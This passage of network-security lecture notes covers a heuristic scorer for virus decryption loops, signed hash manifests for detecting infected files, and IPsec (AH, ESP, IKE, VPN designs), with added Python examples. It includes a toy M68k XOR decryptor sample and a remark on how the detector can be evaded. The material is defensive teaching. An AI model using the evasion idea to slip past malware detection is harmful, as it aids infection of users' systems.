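            found.add("counter_init"); counters.add(dst)
        elif op == "move" and src.strip("()+") in pointers and dst.startswith("d"):
            found.add("mem_read"); tainted.add(dst)        # dN now holds memory data
        elif op in LOGIC_OPS and dst in tainted:
            found.add("logic_op")
        elif op == "move" and src in tainted and dst.strip("()+") in pointers:
            found.add("mem_write")
        elif op in {"subq", "addq"} and dst in counters:
            found.add("counter_update"); counter_just_touched = True
            continue                                      # keep the flag for the branch
        elif op.startswith("b") and counter_just_touched:
            found.add("branch_on_counter")
        counter_just_touched = False
    return found


def weight_score(found: set[str]) -> int:
    return sum(WEIGHTS[c] for c in found)


def weight_based_alarm(found: set[str]) -> bool:
    return weight_score(found) >= THRESHOLD


def rule_based_alarm(found: set[str]) -> bool:
    return RULE <= found


# The lecture's M68k decryption loop (eor with key 1), cleaned up.
DECRYPT_LOOP = """
        lea     test(pc),a0
        move.l  #10,d0          ;counter
.loop   move.b  (a0),d1
        eor.b   #1,d1           ;xor with key equal to 1
        move.b  d1,(a0)+
        subq.l  #1,d0           ;update the counter
        bne.s   .loop           ;if d0 is not 0 jump to .loop
"""

# Constructed benign routine: a plain memory copy has a pointer, a counter,
# reads, writes and a branch, but no logical operation on the data.
COPY_LOOP = """
        lea     src(pc),a0
        lea     dst(pc),a1
        move.l  #10,d0
.copy   move.b  (a0)+,d1
        move.b  d1,(a1)+
        subq.l  #1,d0
        bne.s   .copy
"""


def analyze(program: str) -> dict:
    found = classify(program)
    return {"conditions": sorted(found), "score": weight_score(found),
            "weight_alarm": weight_based_alarm(found), "rule_alarm": rule_based_alarm(found)}


if __name__ == "__main__":
    print("decrypt loop:", analyze(DECRYPT_LOOP))
    print("copy loop:   ", analyze(COPY_LOOP))
```

The copy loop scores 9 of the 12 points the decryption loop scores, which is the practical tension behind the lecture's "quite old system" remark: a weight threshold low enough to catch a loop with a weak logical operation will also flag innocent block copies, whereas the rule (all seven conditions) stays quiet on the copy loop but can be evaded by a loop that is written to miss one condition.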

Alternative to Antivirus

• When computer programs are installed from original media (manufacturer-sealed CD, DVD), it is possible to calculate the hash of the installed files or directory and keep this hash in a safe way (electronically signed).

• Then, before applications are executed, the hash of the files is calculated again and compared with the original one, to check that no changes have been made, i.e. no infection.
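The hash-and-compare scheme above as an added Python example (not from the lecture). The stored manifest is authenticated with an HMAC as a stand-in for the electronic signature the slide mentions; in a real deployment an asymmetric signature is preferable, so that the verifying host does not need to hold the signing key. The files, the key and the simulated infection (a .com file whose first bytes are replaced by a jump and whose length grows, as in the virus shown earlier) are all constructed.

```python
import hashlib
import hmac
import json
import tempfile
from pathlib import Path


def hash_tree(root: Path) -> dict[str, str]:
    """SHA-256 of every file under root, keyed by its relative POSIX path."""
    digests = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        digests[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def sign_manifest(digests: dict[str, str], key: bytes) -> dict:
    """Authenticate the manifest so an attacker cannot simply edit the stored hashes.
    HMAC here stands in for the electronic signature of the lecture (assumption)."""
    body = json.dumps(digests, sort_keys=True).encode()
    return {"manifest": digests, "tag": hmac.new(key, body, "sha256").hexdigest()}


def verify_install(root: Path, signed: dict, key: bytes) -> dict[str, list[str]]:
    """Before running anything: check the manifest tag, then re-hash and diff."""
    body = json.dumps(signed["manifest"], sort_keys=True).encode()
    if not hmac.compare_digest(hmac.new(key, body, "sha256").hexdigest(), signed["tag"]):
        raise ValueError("manifest tag invalid: stored hashes cannot be trusted")
    expected, current = signed["manifest"], hash_tree(root)
    return {
        "modified": sorted(p for p in expected if p in current and current[p] != expected[p]),
        "missing": sorted(p for p in expected if p not in current),
        "added": sorted(p for p in current if p not in expected),
    }


def demo() -> dict[str, list[str]]:
    """Constructed installation, signed at install time, then infected."""
    key = b"constructed-demo-key-kept-offline"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        app = root / "bin" / "app.com"
        app.write_bytes(b"\xe9\x10\x00" + b"\x90" * 16)      # constructed .com: jmp + padding
        (root / "README").write_text("clean install\n")
        signed = sign_manifest(hash_tree(root), key)

        # Simulate the infection the lecture describes: the entry jump is
        # rewritten and code is appended at the end of the .com file.
        app.write_bytes(b"\xe9\x13\x00" + app.read_bytes()[3:] + b"\xcc" * 8)
        (root / "bin" / "dropper.tmp").write_bytes(b"\xcc")  # constructed extra file
        return verify_install(root, signed, key)


def tampered_manifest_rejected() -> bool:
    """An attacker who edits the stored hash without the key is caught by the tag check."""
    key = b"constructed-demo-key-kept-offline"
    signed = sign_manifest({"bin/app.com": "00" * 32}, key)
    signed["manifest"]["bin/app.com"] = "ff" * 32
    try:
        verify_install(Path("."), signed, key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(demo())
    print("tampered manifest rejected:", tampered_manifest_rejected())
```

Two points a practitioner should take from this: the comparison only means something if the manifest itself is protected (hence the tag check before any hashing), and the check reports unexpected new files as well as modified ones, since a dropped component is as much a sign of infection as a changed binary.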

Hot News

W32.Stuxnet is a worm that propagates on USB removable media drives by taking advantage of the "Microsoft Windows Shortcut LNK Files Automatic File Execution Vulnerability". It affects the SCADA (Supervisory Control and Data Acquisition) systems deployed in many industrial facilities, such as nuclear or fuel refinement plants.

Possible target: attack on Iran's nuclear program

Online News
• Computer World UK
• ABC News

Contents

1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
3 Point to Point Security
  Introduction
  VPN Architectures
  IPSec Fundamentals
  Practical Examples


Network Layer Security

Initially, computer networks were used by academic researchers for mail (or information in general) exchange. Security was not very important.

Nowadays this is not the case: millions of users use the Internet to access their bank services, to buy products or services, etc. Then, we need to protect network communications at the layer that is responsible for routing packets across networks.

Network Layers Description

TCP/IP is widely used throughout the world to provide network communications. TCP/IP communications are composed of four layers that work together:

• Application layer: sends and receives data for particular applications, such as DNS, HTTP and SMTP
• Transport layer: provides connection-oriented (TCP) or connectionless (UDP) services for transporting application-layer services between networks
• Network layer: routes packets across networks. The Internet Protocol (IP) is the fundamental protocol
• Data link layer: handles communications on the physical network components. The best-known data link layer protocol is Ethernet

The Need for Network Layer Security

Security controls exist for network communications at each layer of the TCP/IP model. The goal at each layer is:

• Application layer: separate controls must be established for each application. For example, Pretty Good Privacy (PGP) is commonly used to encrypt e-mail messages (SMTP)
• Transport layer: controls at this layer can be used to protect the data in a single communication session between two hosts. For example, the TLS/SSL protocols secure HTTP traffic
• Network layer: controls at this layer apply to all applications and are not application-specific. For example, IPsec secures all network communications between two hosts without modifying applications
• Data link layer: controls are applied to all communications on a specific physical link, such as a dedicated circuit between two buildings or a dial-up modem connection to an ISP

Internet Protocol Security (RFCs 4301 & 4309)

IPsec is the most commonly used network layer security control. IPsec is a framework of open standards for ensuring private communications over IP networks. Depending on its implementation, it can provide any combination of the following types of protection:

• Confidentiality. IPsec can ensure that data cannot be read by unauthorized parties. This is accomplished by encrypting data using a cryptographic algorithm and a secret key
• Integrity. IPsec can determine whether data has been changed during transit. Data integrity can be assured by generating a message authentication code (MAC) value, a cryptographic data checksum
• Peer Authentication. Each IPsec endpoint confirms the identity of the other IPsec endpoint, ensuring that the network traffic and data are being sent from the expected host
• Replay Protection. The same data is not delivered multiple times, and data is not delivered out of order. However, IPsec does not ensure that data is delivered in the exact order in which it is sent
• Traffic Analysis Protection. A person monitoring the traffic does not know which parties are communicating, how often communications are occurring, or how much data is being exchanged. However, the number of packets can be counted
• Access Control. IPsec endpoints can perform filtering to ensure that only authorized IPsec users can access particular network resources

Virtual Private Networking (VPN)

The most common use of IPsec implementations is providing Virtual Private Networking (VPN) services.

A VPN is a virtual network, built on top of existing physical networks, that can provide a secure communications mechanism for data and IP information transmitted between networks.

As VPNs can be used over the Internet, they facilitate the secure transfer of sensitive data across public networks.

VPN Advantages

• VPNs are often less expensive than alternatives such as dedicated private communication lines (e.g. X.25 lines)
• VPNs can also provide flexible solutions, such as securing communications between remote telecommuters (remote workers) and the organization's servers, regardless of where the telecommuters are located
• A VPN can even be established within a single network to protect particularly sensitive communications from other parties on the same network (e.g. server administration)

VPN & Cryptography

VPNs can use both private and public key cryptography:

• Private key cryptography uses the same key for both encryption and decryption (e.g. DES, 3DES, AES, ...). It is used for protecting the actual data because of its relative efficiency
• Public key cryptography uses separate keys for encryption and decryption, or to digitally sign and verify a signature (e.g. RSA, ...). It is used to authenticate the identities of both parties


Gateway-to-Gateway Architecture

IPsec-based VPNs are often used to provide secure network communications between two networks by deploying a VPN gateway onto each network and establishing a VPN connection between them.

Usually, to facilitate VPN connections, one of the VPN gateways issues a request to the other to establish an IPsec connection. Routing on each network is configured so that, as hosts on one network need to communicate with hosts on the other network, their network traffic is automatically routed through the IPsec connection.

This is the easiest VPN model to implement, in terms of user and host management.

Host-to-Gateway Architecture

This model is used to provide secure remote access. The organization deploys a VPN gateway onto its network; each remote access user then establishes a VPN connection between his/her host and the VPN gateway.

IPsec connections are created as needed for each individual VPN user. The user is typically asked by the VPN gateway to authenticate before the connection can be established.

The host-to-gateway model is somewhat complex to implement and maintain in terms of user and host management.

Host-to-Host Architecture

This is the least commonly used VPN architecture. It is typically used for special-purpose needs, such as system administrators performing remote management of a single server.

This model is the only one that provides protection for data throughout its transit. This can be a problem, because packet firewalls, IDS and other devices cannot be placed to inspect the decrypted data, which effectively circumvents certain layers of security.

Model Comparison

Feature                                                      G-to-G   H-to-G   H-to-H
Provides protection between client and local gateway         No       N/A      N/A
Provides protection between VPN endpoints                    Yes      Yes      Yes
Protection between remote gateway and remote server
  (behind gateway)                                           No       No       N/A
Transparent to users                                         Yes      No       No
Transparent to servers                                       Yes      Yes      No


IPSec Components

IPsec is a collection of protocols that assist in protecting communications over IP networks, working together in various combinations to provide protection for communications.

Main protocols

• Authentication Header (AH). It provides integrity for packet headers
• Encapsulating Security Payload (ESP). It provides authentication and encryption services
• Internet Key Exchange (IKE). It negotiates, creates and manages security associations (SAs)

Authentication Header (AH)

AH provides integrity protection for packet headers and data, as well as user authentication. It can optionally provide replay protection and access protection. AH cannot encrypt any portion of packets.

Its usefulness is debatable, since ESP also provides authentication. However, AH is still of value because AH can authenticate portions of packets that ESP cannot.

AH Modes

AH provides integrity protection for the entire packet, regardless of which mode is used.

• Tunnel mode: AH creates a new IP header for each packet. It is used in gateway VPNs.

    | New IP Header | AH Header | Original IP Header | Transport and Application Protocol Headers and Data |
    |<----------------------------- Authenticated (Integrity Protection) ------------------------------->|

• Transport mode: AH does not create a new IP header. It is used in host-to-host VPNs.

    | IP Header | AH Header | Transport and Application Protocol Headers and Data |
    |<------------------ Authenticated (Integrity Protection) -------------------->|

Integrity Protection Process

The first step of integrity protection is to create a hash by using a keyed hash algorithm → a message authentication code (MAC).

Keyed hash algorithms create a hash based on both a message and a secret key shared by the two endpoints. The hash is added to the packet, and it is sent to the recipient.

The recipient can then regenerate the hash using the shared key and confirm that the two hashes match, providing integrity protection for the packet.

Dynamic Header Fields

Certain IP header fields, such as time to live (TTL) and the IP header checksum, are dynamic and may change during routine communications.

If the hash is calculated on all the original IP header values, the recalculated hash will be different.

To avoid this problem, IP header fields that may legitimately change in transit in an unpredictable manner are excluded from the integrity protection calculations.

NAT Problems

For the same reason as before, AH is often incompatible with network address translation (NAT) implementations.

The IP source and destination address fields are included in the AH integrity protection calculations.

If these addresses are altered by a NAT device, the AH integrity protection calculation made by the destination will not match.

Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples

AH Header

Next Header Payload Length ReservedSecurity Parameters Index

Sequence NumberAuthentication Information

• Next Header. It contains the IP protocol number for the next packet payload. In tunnel mode, the payload is an IP packet, so the Next Header value is set to 4 for IP-in-IP. In transport mode, the payload is usually a transport-layer protocol, often TCP (6) or UDP (17)

• Payload Length. This field contains the length of the payload in 4-byte increments, minus 2

• Reserved. This value is reserved for future use, so it should be set to 0

• Security Parameters Index (SPI). Each endpoint has an arbitrarily chosen SPI value, which acts as a unique identifier for the connection. The recipient uses the SPI value, along with the destination IP address and (optionally) the IPsec protocol type to determine which Security Association (SA) is being used

• Sequence Number. Each packet is assigned a sequential sequence number, and only packets within a sliding window of sequence numbers are accepted. This provides protection against replay attacks

• Authentication Information. This field contains the MAC output


How AH works

Example

ICMP echo request packet in transport mode: it only contains a single IP header


How AH works

Example

AH header for the first four packets in an AH session between A and B

• SPI. A uses the hex value cdb59934 for the SPI in its packets, while host B uses the hex value a6b32c00 for the SPI in its packets. An AH connection is composed of two one-way connections, each with its own SPI

• Sequence Number. Both hosts initially set the sequence number to 1, and both incremented the number to 2 for their second packets

• Authentication Information. The authentication (integrity protection) information, a keyed hash based on the bytes in the packet, is different in each packet. It should be different even if only one byte in a hashed section changes
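An added example, not the lecture's own material, that packs and parses the AH header for the four packets just described in Python: the two SPI values from the slide, sequence numbers 1 and 2 in each direction, and an HMAC-SHA1-96 ICV that differs between packets even when the payload is identical. The keys and the ICMP payload are constructed; the immutable IP header fields are deliberately left out of the hash to keep the example short, which a real implementation must not do.

```python
import hashlib
import hmac
import struct

AH_FIXED = "!BBHII"  # Next Header, Payload Length, Reserved, SPI, Sequence Number
AH_FIXED_LEN = struct.calcsize(AH_FIXED)  # 12 bytes
ICV_LEN = 12  # HMAC-SHA1-96 truncates the tag to 96 bits
# Payload Length is the AH length in 32-bit words minus 2: (12 + 12) / 4 - 2 = 4
PAYLOAD_LENGTH = (AH_FIXED_LEN + ICV_LEN) // 4 - 2

# SPI values used on the slide for the two one-way SAs (A->B and B->A).
SPI_A_TO_B = 0xCDB59934
SPI_B_TO_A = 0xA6B32C00


def build_ah(key, next_header, spi, seq, payload):
    """AH header (fixed part + ICV) for one packet. The ICV is the keyed hash
    over the AH header with the ICV field zeroed, followed by the payload.
    Simplification (constructed for this example): the immutable IP header
    fields are left out of the hash here."""
    fixed = struct.pack(AH_FIXED, next_header, PAYLOAD_LENGTH, 0, spi, seq)
    icv = hmac.new(key, fixed + bytes(ICV_LEN) + payload, hashlib.sha1).digest()[:ICV_LEN]
    return fixed + icv


def parse_ah(buf):
    """Split an AH header into its fields; ah_len is derived from Payload Length."""
    nh, plen, _reserved, spi, seq = struct.unpack(AH_FIXED, buf[:AH_FIXED_LEN])
    ah_len = (plen + 2) * 4
    return {"next_header": nh, "ah_len": ah_len, "spi": spi, "seq": seq,
            "icv": buf[AH_FIXED_LEN:ah_len]}


def verify_ah(key, buf, payload):
    """Recompute the ICV with the ICV field zeroed and compare in constant time."""
    fields = parse_ah(buf)
    fixed = buf[:AH_FIXED_LEN]
    expected = hmac.new(key, fixed + bytes(len(fields["icv"])) + payload,
                        hashlib.sha1).digest()[:ICV_LEN]
    return hmac.compare_digest(expected, fields["icv"])


def ah_session(key_ab, key_ba, payload):
    """First four AH headers of a session: A and B each send seq 1 then seq 2,
    each direction under its own SPI and its own key."""
    packets = []
    for seq in (1, 2):
        packets.append(("A->B", build_ah(key_ab, 1, SPI_A_TO_B, seq, payload)))
        packets.append(("B->A", build_ah(key_ba, 1, SPI_B_TO_A, seq, payload)))
    return packets


if __name__ == "__main__":
    echo = b"\x08\x00" + bytes(6)  # constructed ICMP echo request stub (Next Header 1)
    for direction, ah in ah_session(b"constructed-key-ab", b"constructed-key-ba", echo):
        f = parse_ah(ah)
        print(direction, hex(f["spi"]), f["seq"], f["icv"].hex())
```

Because the sequence number sits inside the hashed region, the four ICVs come out different even though every packet carries the same payload, which is the point the slide makes about a single changed byte; a packet verified under the wrong direction's key also fails, since each one-way SA has its own key.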


Encapsulating Security Payload (ESP)

ESP is the second core IPsec security protocol. It provides both encryption for packet payload data and authentication to provide integrity protection (although not for the outermost IP header)

ESP's encryption and authentication can be disabled

ESP can be used to provide only encryption; encryption and integrity protection; or only integrity protection


ESP Modes

• Tunnel mode: It creates a new IP header for each packet. The new IP header lists the endpoints of the ESP tunnel as the source and destination of the packet.

Packet layout (figure): New IP Header | ESP Header | Original IP Header | Transport and Application Protocol Headers and Data | ESP Trailer | ESP Auth. (optional)
Encrypted: Original IP Header through ESP Trailer. Authenticated (Integrity Protection): ESP Header through ESP Trailer.

It can encrypt and/or protect the integrity of both the data and the original IP header. Encrypting the data protects it from being accessed or modified by unauthorized parties; encrypting the IP header conceals the nature of the communications, such as the actual source or destination of the packet. If authentication is being used for integrity protection, each packet will have an ESP Authentication section after the ESP trailer


ESP Modes

• Transport mode: it uses the original IP header instead of creating a new one.

Packet layout (figure): IP Header | ESP Header | Transport and Application Protocol Headers and Data | ESP Trailer | ESP Auth. (optional)
Encrypted: Transport and Application Protocol Headers and Data through ESP Trailer. Authenticated (Integrity Protection): ESP Header through ESP Trailer.

It can only encrypt and/or protect the integrity of packet payloads and certain ESP components, but not IP headers. As with AH, ESP transport mode is generally only used in host-to-host architectures. Also, transport mode is incompatible with NAT


Encryption Process

ESP uses symmetric cryptography to provide encryption for IPsec packets. Both endpoints must use the same key to encrypt and decrypt the packets.

When an endpoint encrypts data, it divides the data into small blocks (e.g. for the AES algorithm, 128 bits each), and then performs multiple sets of cryptographic operations using the data blocks and shared key

When the other endpoint receives the encrypted data, it performs decryption using the same key and a similar process


ESP Packet Fields

Each ESP header is composed of two fields:

• SPI. Each endpoint of each IPsec connection has an arbitrarily chosen SPI value, which acts as a unique identifier for the connection. The recipient uses the SPI value, along with the destination IP address and (optionally) the IPsec protocol type (in this case, ESP), to determine which SA is being used

• Sequence Number. Each packet is assigned a sequential sequence number, and only packets within a sliding window of sequence numbers are accepted. This provides protection against replay attacks
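The sliding window mentioned for both the AH Sequence Number field and the ESP one is implemented below in Python, as an added example that is not from the lecture: a 64-packet window with a non-mutating check before ICV verification and a commit afterwards, run over a constructed arrival order containing a reorder, a replay, a jump and a late packet. The window size and the trace are assumptions for the demonstration.

```python
class ReplayWindow:
    """Sliding anti-replay window as used by AH and ESP receivers (an
    independent reimplementation of the scheme, not the lecture's code).
    `top` is the highest sequence number accepted so far and bit i of
    `bitmap` records whether sequence number top - i was already accepted."""

    def __init__(self, size=64):
        if size < 32:
            raise ValueError("IPsec requires a window of at least 32 packets")
        self.size = size
        self.top = 0
        self.bitmap = 0

    def check(self, seq):
        """Non-mutating test: is `seq` new and inside the window?
        Call this before the (expensive) ICV verification."""
        if seq == 0:                 # sequence number 0 is never sent
            return False
        if seq > self.top:           # right of the window: always new
            return True
        offset = self.top - seq
        if offset >= self.size:      # fell off the left edge: too old
            return False
        return not (self.bitmap >> offset) & 1   # bit set => replay

    def commit(self, seq):
        """Record `seq` after its ICV verified; slides the window if needed."""
        if seq > self.top:
            shift = seq - self.top
            self.bitmap = ((self.bitmap << shift) | 1) & ((1 << self.size) - 1)
            self.top = seq
        else:
            self.bitmap |= 1 << (self.top - seq)

    def accept(self, seq, icv_ok=True):
        """Receiver decision for one packet: window check, ICV result, commit.
        A packet whose ICV failed must not advance the window."""
        if not self.check(seq) or not icv_ok:
            return False
        self.commit(seq)
        return True


def run_trace(seqs, size=64):
    """Feed a constructed arrival order through one window; accept/reject per packet."""
    win = ReplayWindow(size)
    return [win.accept(s) for s in seqs]


if __name__ == "__main__":
    # Constructed arrival order: in order, a reorder (5 before 4), a replay of 3,
    # a jump to 100, a late-but-inside 40, and 36 which is now outside the window.
    trace = [1, 2, 3, 5, 4, 3, 100, 40, 36]
    print(list(zip(trace, run_trace(trace))))
```

The split into `check` and `commit` matters for the defender: the window is only updated once the keyed hash has verified, otherwise a forged packet carrying a large sequence number could slide the window forward and cause legitimate in-flight packets to be dropped as "too old".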


ESP Packet Fields

The next part of the packet is the payload. It is composed of

• Payload data. It is encrypted

• Initialization vector (IV). It is not encrypted. The IV is used during encryption. Its value is different in every packet, so if two packets have the same content, the inclusion of the IV will cause the encryption of the two packets to have different results


ESP Packet Fields

The third part of the packet is the ESP trailer, which contains

• Padding. An ESP packet may optionally contain padding, which is additional bytes of data that make the packet larger and are discarded by the packet's recipient. Because ESP uses block ciphers for encryption, padding may be needed so that the encrypted data is an integral multiple of the block size

• Padding Length. This number indicates how many bytes long the padding is

• Next Header. In tunnel mode, the payload is an IP packet, so the Next Header value is set to 4 for IP-in-IP. In transport mode, the payload is usually a transport-layer protocol, often TCP (6) or UDP (17)
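An added Python example (not the lecture's code) of the trailer arithmetic: computing the padding so that the encrypted part aligns to the AES block size, assembling SPI, Sequence Number, IV and the block-aligned plaintext, and recovering the payload on the receiving side. The cipher itself is left out of the block (a real implementation encrypts the aligned bytes under the SA key); the SPI value is the one from the slide and the payloads are constructed.

```python
import os
import struct

AES_BLOCK = 16  # AES block size in bytes; the encrypted part must align to it


def esp_trailer(payload_len, next_header, block_size=AES_BLOCK):
    """Padding, Pad Length and Next Header such that
    payload + padding + 2 trailer bytes is a multiple of block_size.
    Padding bytes follow the RFC 4303 default pattern 1, 2, 3, ..."""
    pad_len = (-(payload_len + 2)) % block_size
    padding = bytes(range(1, pad_len + 1))
    return padding + struct.pack("!BB", pad_len, next_header)


def esp_plaintext(payload, next_header, block_size=AES_BLOCK):
    """The bytes handed to the block cipher: payload followed by the ESP trailer."""
    return payload + esp_trailer(len(payload), next_header, block_size)


def split_esp_plaintext(plaintext):
    """Receiver side after decryption: strip the trailer and recover
    (payload, next_header). Raises ValueError on a malformed trailer."""
    if len(plaintext) < 2:
        raise ValueError("ESP trailer missing")
    pad_len, next_header = struct.unpack("!BB", plaintext[-2:])
    if pad_len + 2 > len(plaintext):
        raise ValueError("Pad Length exceeds packet")
    padding = plaintext[len(plaintext) - pad_len - 2:len(plaintext) - 2]
    if padding != bytes(range(1, pad_len + 1)):
        raise ValueError("padding pattern mismatch")
    return plaintext[:len(plaintext) - pad_len - 2], next_header


def esp_packet(spi, seq, payload, next_header, iv=None, block_size=AES_BLOCK):
    """ESP header (SPI, Sequence Number), per-packet IV, then the block-aligned
    plaintext. A real implementation encrypts `plaintext` at this point and,
    with integrity protection enabled, appends an ICV over header + IV +
    ciphertext; both are omitted here so the framing stays visible."""
    iv = os.urandom(block_size) if iv is None else iv  # fresh IV per packet
    plaintext = esp_plaintext(payload, next_header, block_size)
    assert len(plaintext) % block_size == 0
    return struct.pack("!II", spi, seq) + iv + plaintext


if __name__ == "__main__":
    pkt = esp_packet(0xA6B32C00, 1, b"x" * 41, 4)   # tunnel mode: Next Header 4
    print(len(pkt), "bytes;", pkt[:8].hex(), "= SPI + seq")
    print(split_esp_plaintext(pkt[8 + AES_BLOCK:]))
```

The padding pattern check on the receiving side is cheap and catches a corrupted or mis-decrypted trailer early; since Pad Length is itself inside the encrypted region, the receiver validates it against the packet length before trusting it.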


ESP Packet Fields

If ESP integrity protection is enabled, the ESP trailer is followed by an Authentication Information field. As in the AH header, this field contains the MAC output. Unlike AH, the MAC in ESP does not include the outermost IP header in its calculations


How ESP works

Example

It contains five sections: Ethernet header, IP header, ESP header, encrypted data (payload and ESP trailer), and (optionally) authentication information. From the encrypted data, it is not possible to determine if this packet was generated in transport mode or tunnel mode.


How ESP works

Example

ESP header for the first four packets in an AH session between A and B

The SPI and Sequence Number fields work the same way in ESP that they do in AH.


Internet Key Exchange (IKE)

The IKE protocol negotiates, creates, and manages security associations (SA). SA is a generic term for a set of values that define the IPsec features and protections applied to a connection

The IKE protocol has two phases:

• Phase One Exchange → the IPsec endpoints negotiate a secure channel (IKE SA) through which an IPsec SA can be negotiated

• Phase Two Exchange → the purpose of phase two is to establish an SA for the actual IPsec connection


Phase One Exchange Modes

• Main mode. It negotiates the establishment of the IKE SA through three pairs of messages

1 In the first pair of messages, each endpoint proposes parameters to be used for the SA

2 The second pair of messages performs a key exchange through Diffie-Hellman

3 In the third pair of messages, each endpoint is authenticated to the other


Phase One Exchange Modes

• Aggressive mode. It offers a faster alternative to main mode. It negotiates the establishment of the IKE SA through three messages

1 In the first message, endpoint A sends all the protection suite parameters, as well as its portion of the Diffie-Hellman key exchange, a nonce, and its identity

2 In the second message, endpoint B sends the protection suite parameters, its portion of the Diffie-Hellman key exchange, a nonce, its identity, and its authentication payload (through digital signature or hash)

3 In the third message, endpoint A sends its authentication payload


Phase One Exchange

In phase one, each endpoint proposes parameters for the SA. The four mandatory parameters are referred to as the protection suite

• Encryption Algorithm. This specifies the algorithm to be used to encrypt data, e.g. DES, 3DES, AES, ...

• Integrity Protection Algorithm. This indicates which keyed hash algorithm should be used for integrity protection, e.g. HMAC-MD5, HMAC-SHA-1, ...

• Diffie-Hellman (DH) Group. It is used to generate a shared secret for the endpoints in a secure manner.

• Authentication Method. There are several possible methods for authenticating the two endpoints (Pre-shared Keys, Digital Signatures, ...)


Phase Two Exchange

The purpose of phase two is to establish an SA for the actual IPsec connection (IPsec SA). The IPsec SA is created using three messages:

• In the first message, endpoint A sends keys, nonces, and IPsec SA parameter suggestions. The nonces are an anti-replay measure

• In the second message, endpoint B sends keys, nonces, and IPsec SA parameter selections, plus a hash for authentication

• In the third message, endpoint A sends a hash for authentication


Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and Trojans

3 Point to Point Security
Introduction
VPN Architectures
IPSec Fundamentals
Practical Examples


ESP in a Gw-to-Gw Architecture

The goal is to establish an IPsec connection that provides encryption and incomplete integrity protection (the outermost IP header is not covered) between endpoints (gateways) A and B. Initially, we have to create an IKE SA, as follows:

1 Endpoint A creates and sends a regular (non-IPsec) packet that has a destination address of endpoint B

2 Network A routes the packet to gateway A

3 Gateway A receives the packet and performs NAT, altering the packet's source IP address

4 Gateway A initiates an IKE SA negotiation with Gateway B using either main mode or aggressive mode. At the end of the negotiation, the IKE SA is created


ESP in a Gw-to-Gw Architecture

The next step is to create the IPsec SA, as follows:

5 GW A uses the parameters set in the IKE SA to initiate an IPsec SA negotiation with GW B. ESP tunnel mode is used

6 Once the two IPsec SAs are created, gateway A finishes processing the packet sent by endpoint A in step 1:

  1 GW A modifies the packet in accordance with the SA parameters: a new IP header is added (source IP: GW A and destination IP: GW B), the data is encrypted and the authentication information is added

  2 Gateway A then sends the packet to Gateway B

  3 GW B receives the packet and uses the SPI value in the unencrypted ESP header to determine the SA parameters. GW B processes and validates the packet: it removes the additional IP header, checks the integrity and decrypts the original payload

  4 GW B sends the packet to endpoint B


AH and ESP in a Gw-to-Gw Architecture

The goal is to establish an IPsec connection that provides encryption and complete integrity protection (including headers) between endpoints (gateways) A and B

Steps 1-4 are identical to the previous example

5 Gateway A uses the parameters set in the IKE SA to initiate an IPsec SA negotiation with gateway B for the AH service. The IKE SA provides protection for the negotiation of the AH tunnel mode

6 Step 5 is repeated to negotiate the SAs for the ESP service
